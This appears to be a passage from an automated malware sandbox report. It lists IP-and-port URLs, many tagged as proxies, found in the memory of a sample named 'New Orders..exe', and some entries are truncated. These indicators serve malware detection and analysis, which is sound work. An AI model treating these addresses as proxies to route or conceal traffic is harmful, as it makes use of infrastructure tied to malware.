                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD297A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.49.160.32:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.60.219.63:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.60.219.63:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.60.240.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.60.240.69:53281
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.60.240.69:53281://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.134.236.231:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.134.236.231:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.133.116:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.133.116:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266F1000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.211.182:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.211.182:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.141.177.23
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.141.177.23://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.141.177.23:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.142.81.218
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.142.81.218://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.142.81.218:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.169.83.87:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.169.83.87:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.195.164.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.195.164.53:7777
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.195.164.53:7777://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.198.164
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.198.164://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.198.164:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.131.242.221
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.131.242.221:48678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.131.242.221:48678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.16.5:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.16.5:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.254.10:8081
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.254.10:8081://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.254.130:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.254.130:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.110.214.134:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.110.214.134:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.112.164.219:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.112.164.219:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.115.232.158:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.115.232.158:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.120.28.228
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.120.28.228://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.120.28.228:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.129.183.19:53281
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.129.183.19:53281://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.143.11.157:10219
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.143.11.157:10219://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD260DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.204.0.36:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD260DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.204.0.36:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.243.147:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.243.147:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.41.210:7654
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.41.210:7654://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.41.21:7654
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.41.21:7654://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.209.78.75:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.209.78.75:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.209.82.202:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.212.136.34:7518
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.212.136.34:7518://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.212.45.226:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.212.45.226:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.212.45.228:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.212.45.228:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.224.247.141:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.224.247.141:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.39.27.225:1994
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.39.27.225:1994://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.57.131.122:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.57.131.122:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.65.169.37:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.65.169.37:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.66.37.200:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.66.37.200:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.74.83.25:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.74.83.25:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.11.217:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.11.217:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.11.218:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.11.218:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.13.91:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.13.91:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.13.91:5678H
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.19.2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.19.248:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.19.248:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.19.249:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.19.249:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.22.228:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.22.228:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.74.78:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2508C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.74.78:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.85.45:998
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.85.45:998://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.86.250:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.78.86.250:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.140.244.163:8118
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.140.244.163:8118://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29AA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.160.100.156:5020
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.160.100.156:5020://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.253.153.238:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.253.153.238:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.253.181.10:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.253.181.10:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.52.229.165:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.52.229.165:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25468000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD298B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.53.216.4:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD298B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.53.216.4:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.72.203.255
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.72.203.255://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.72.203.255:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD298C9000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.78.42.112:83
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29A5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.78.42.112:83://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.164.254.8:4216
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.164.254.8:4216://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.179.187.16:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.179.187.16:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.215.23.242:9091
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.215.23.242:9091://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.184.48:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.184.48:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.192.215:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.192.215:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.212.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.212.167:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.212.167:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.212.184:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.212.184:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.231.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.231.188:34599
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.88.231.188:34599://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.117.134:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.117.134:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.41.224:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.41.224:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.79.2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.79.25:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.79.25:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.9.20:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.9.20:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.89.9.82:8080
